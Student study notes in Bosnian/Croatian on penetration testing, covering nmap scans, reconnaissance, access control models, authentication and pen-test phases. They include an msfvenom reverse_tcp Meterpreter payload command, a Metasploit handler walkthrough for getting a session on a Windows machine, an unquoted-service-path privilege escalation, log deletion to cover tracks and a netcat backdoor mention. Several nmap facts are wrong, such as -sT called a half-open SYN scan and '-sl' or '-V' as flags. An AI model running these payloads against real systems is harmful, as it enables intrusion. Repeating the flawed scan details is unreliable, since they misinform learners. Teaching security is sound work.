Nebitno Skroz

You might also like

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 4

VJEŽBEEE GORAN

Prvi korak traženja exploita je keniranje portova da se vidi da li iza njega stoji neki servise

Aplikacije otvaraju broj porta (npr Apache2 80)

Ransomware WannaCry kriptuje disk i traži pare, korišten je eternalBlue propust da se dođe do
podataka, to je jer nisu imali update sa najnovijim sigurnosnim zakrpama

nmap nam može dati: TCP/UDP servise (usluge) na ciljanom sistemu, vrstu operativnog sistema,
aplikacije ili verzije servisa, protokoli koji su aktivni... itd.

nmap -sT (defaultno skeniranje, firewall propušta) TCP SYN metoda – poluotvoreno skeniranje, half
open jer se ne ostvaruje potpuna TCP veza, ne završava se 3way handshake nego RST

Portovi mogu biti open, closed i filtered

Skeniranje -sF koji su zatvoreni portovi, šalje se paket FIN flag, RST se vraća za sve koji su zatvoreni
(ali radi samo sa nekim UNIX-ovim)

skeniranje -sX Christmas tree skeniranje šalju se FIN, URG i PUSH i treba na sve uzvratiti RST

-sN flaf NULL treba vratiti rst za sve zatvorene portove, isključuju se (resetuju) svi indikatori.

-sA nikad ne otkriva otvorene portove nego mu je namjena mapirati pravila firewalla da vidi je li
stateful i koji su portovi filtrirani

-sW skeniranje TCP prozora, otkrivaju se otvoreni kao i filtrirani portovi na sistemima

-nmap-rpc specificna za UNIX sisteme, za daljinsko povezivanje i verzija programa itd

UDP skeniranje

ako dobijemo ICMP poruku unreachable onda je zatvoren, a ako ne onda je otvoren

-V za skeniranje prikazuje verziju

payload, msfvenom -p windows/meterpreter/reverse_tcp set lhost=našračunar set lport=443 f exe


/home/kali/Desktop/file.exe

sudo nekiservis stop

sudo python -m SimpleHTTPServer 80 (instaliraj python modul na taj port i osluškuje za dolazne
konekcijske zahtjeve)

msfconsole – tako se ulazi u metasploit framework

use exploit/multi/handler setuje se lhost i lport i set payload koji koristimo, zatim run i on ide na
reverse tcp i onda se udje sa windowsa na tu IP adresu na desktop skine se file.exe i otvori se sesija

wget može se dobiti na stranici sadržaj odakle vuče itd

host komanda pretvara ime domene u adresu (pa se može cat i grep staviti u file samo adrese)

Prva faza je izviđanje: znači koja je to web stranica koji su linkovi i slično

E sad možemo skenirati IP adrese i pokušati pronaći ranjivi sistem


DEVOPS- ljudi profesionalci koji se bave automatizacijom procesa (update za sve servere) onda su
sigurni

AAA (authentication, authorization, accountability) – shvatanje računarske i mrežne sigurnosti i


kontrole pristupa. Koristi se da bi se poduprijela CIA, a neki AAA proširuju na Identification i Auditing

Naš zadatak je zaštititi autentifikacijske podatke, credentials

Smart cart, biometrijski uređaj ili hardware za pristup mreži: router, firewall, RAS (remote access
server), VPN isl.

Accountability znači logiranje i kontrolisanje sistema, kao neki audit i praćenje. Nije uključen po
defaultu već samo neke ograničene funkcionalnosti.

Kontrola pristupa MAC (mandatory, obavezna), DAC (discretionary, samovoljna) i RBAC (role-based)
AUTORIZACIJA

MAC usađena u OS, a može i na nivou aplikacija. Obično su kodirane u sistem za svaki objekat tako da
se ne mogu mijenjati. Obično se koriste u vojskama ili intelligence agency gdje je bitna hijerarhija
podataka. (non-discretionary, multilevel, label-based, universally applied)

DAC kreirao korisnik ili aplikacija i ima potpunu kontrolu nad njim, primjenjivo na OS i definisanje
privilegija, vlasnik samovoljno mijenja, može biti i preneseno vlasništvo (chmod, chown). Ne
dozvoljava kontrolu kao MAC, ali manje posla ima nad resursima, ne mora se ugraditi u sistem sve.
(discretionary, controllable, transferable) – i „labavija“ od MAC metode

RBAC role based, usporedba sa konceptom grupa u Windows-u, ali dozvoljava više detaljisanja za
pojedine uloge. Više vremena i novca, ali je jako fleksibilan. (job based, highly configurable, više
fleksibilan nego MAC, više precizan neko grupe u OS-u)

Načini autentifikacije: korisničko ime i lozinka (ovo je okej ako nema mreže ako se ne povezuje, tj.
standalone kompjuter), jedino ako se stalno mijenja i ako su random karakteri, može biti okej;
smart card i token (mora karticu imati uz sebe, a token generiše session key), Kerberos, PAP, CHAP,
multifactor autentifikacija (proširuje se klasična autentifikacija, npr. lozinka i smartphone
authentificator, poruka na telefon pa onda ukucati), uzajamna autentifikacija (razmjene ključeve ..)

Windows eskalacija privilegija exploit servisa sa navodnicima (pogrešno kodiranje) vidjeti one koji
User ima F pa se onda preimenovati exe file koji će kreirati novog korisnika (zaboravio je da definiše
navodnike)

Penetracijski testovi, hacker (ima značajno tehnološko znanje), vanjski napadači, interni korisnici
mogu prijetiti, pa mi ovim procesom ispitujemo sigurnost pokušavajući doći do nekih resursa. Treba
često testirati mrežu da bi se pravovremeno otkrili propusti.

Može ih obavljati firma koja se angažuje, ali i tim ljudi iz kompanije koja se testira (interno), ali on
nesvjesno pokušava tamo gdje su već implementirane sigurnosne mjere. Neko s vana simulira na sve
načine. Trebaju i uposlenici, ali treba i angažovati periodično da on uradi.

Rezultati pen testova trebaju biti osnova za gradnju sigurnosti IS. Ethical hacker tj White hat(njih se
angažuje da se nađu problemi i onda dijele s njima te propuste i traže zakrpe da spriječe napade) –
oni kontaktiraju proizvođača da mu kažu za propust ili objavljuju online patch ili rješenje problema.
Black hat/mallicious oni rade bez znanja kompanije i ako nađu ranjivost iskorištavaju taj propust
kako bi došli do resursa (informacija, mrežnih i drugih stvari), nekad mogu na darkwebu biti serveri
kod korisnika koji uopće ne znaju da je to tako (ne zna da je instalacija tu), drže za sebe te propuste
Exploit je dio koda ili slijed naredbi koje koriste propuste u sistemu kako bi se uzrokovale
neočekivane aktivnosti.

Tip ranjivosti(SQL injection, code injection,XSS..)

Gdje se koristi (udaljenost)

Remote exploit-ranjivost se iskorištava preko mreže bez prethodnog pristupa sistemu

Local exploit – mogućnost pristupa sistemu i povećava povlastice napadača

Kakav je rezultat korištenja (EoP,DoS,Spoofing)

Vrste pen-testova:

Black box testing – testiranje sigurnosti bez prethodnog znanja o infrastrukturi i poslovanju
kompanije (tačno kako bi napadač izvršio to), najteži je i moraju se prvo prikupiti podaci o mreži,
sistemu itd. Najskuplja je i duže traje jer zahtijeva najveći nivo znanja, ali je najrealnija.

White box testing – poznaje mrežnu infrasturkturu od početka testiranja, sve se da, opis dizajna
sistema, adrese, source code itd. Ovo je efektivno za simulaciju internog napada od bivših
zaposlenika i slično ko već poznaje čitavu infrastrukturu.

Grey box testing – radi uštede vremena i postizanja detaljnijih rezultata testiranja obavlja se uz
ograničene informacije. Kompromis između black box i white box pentest.

Koraci pentesta:

1. Information gathering/reconnaisance – domene, adrese, dns i slično


2. Scanning sve te adrese, domene itd koji su hostovi aktivni, koji su servisi na tim hostovima
3. Attack phase/exploitation idemo iskoristiti servise neke itd.
4. Reporting gdje pišemo šta smo radili, šta smo otkrili, postigli i kako se može to ublažiti

Proces exploitacije se dijeli na pristup sistemu i dobivanje većih privilegija kad već imamo pristup.

Nekad se koristi i faza Covering tracks gdje brišemo log datoteke, da se ne bi otkrile sumnjive
aktivnosti. (dummy komande, prepišu se maliciozne radnje)

Prikupljanje informacija:

Intelligence gathering: dobiti što više informacija o meti, lista domenskih naziva, web pretraživači,
izvještaji kopanije, Netcraft, WHOIS(DNS), perl alati, social networking servisi
Footprinting: dobiti DNS nazive hostova, IP adrese i opsege IP adresa koje se koriste, DNSforward,
WHOIS(ip), perl alati, SMTP, Kartoo,google, Aura,Wikto

Verifikacija: provjera range adresa koje pripadaju toj kompaniji da se na njih fokusiramo,
DNS(reverse), WHOIS(IP)

Analiza linkova je prva faza istraživanja, traže se linkovi koji idu od i prema stranici. Možemo otkriti
poslovne odnose između nekih kompanija. veza između domene i ip adrese

Domain name expansion, da li ima neka druga domena, koliko ima sličnih stranica, možda je neka
manje sigurna zbog mirorringa nslookup -type-any

Skeniranje

Identifikacija aktivnih mašina, OS pod kojim rade, otvorenih portova, servisa na njima itd.

Može se podijeliti na dva dijela: ping sweep (otkrivanje aktivnih sistema, obično se koristi ICMP gdje
se šalje echo request i echo reply pa se dobije ili odgovor ili ništa) i enumeration (otkrivanje nečega
na aktivnom sistemu)

nmap kad se kombinuje sa -sP vrši samo provjeru aktivnih računara bez skeniranja portova (šalje
icmp echo i tcp syn)

Ako hoćemo zaobići firewall koji je stateful pa ne prihvata SYN pakete onda koristimo -PA opciju

-oA opcija exportuje rezultate skeniranja u neki file .nmap .gnmap (može se nastaviti) .xml extenzije

-sS sigurno skeniranje, samo se inicira i onda se terminira

-T5 je za brže skeniranje 0-5 timing interval

Zombie skeniranje -sl [zombie][target]

OS fingerprint – ima otiske 1500 sistema, i onda ako ga prepozna daje informacije o sistemu

može i alatom netcat (nc) može se kreirati backdoor

Ettercap / ARP vulnerabilities, Man in the middle napad, alat koji dopušta presretanje i mijenjanje
info. Ali samo u lokalnoj mreži

Exploiti, su napisani u python, ruby, perl. ali trebamo paziti da ne oborimo servere jer postoje takvi
exploiti

System hardening, OS hardening, mrežni hardening, app hardening

You might also like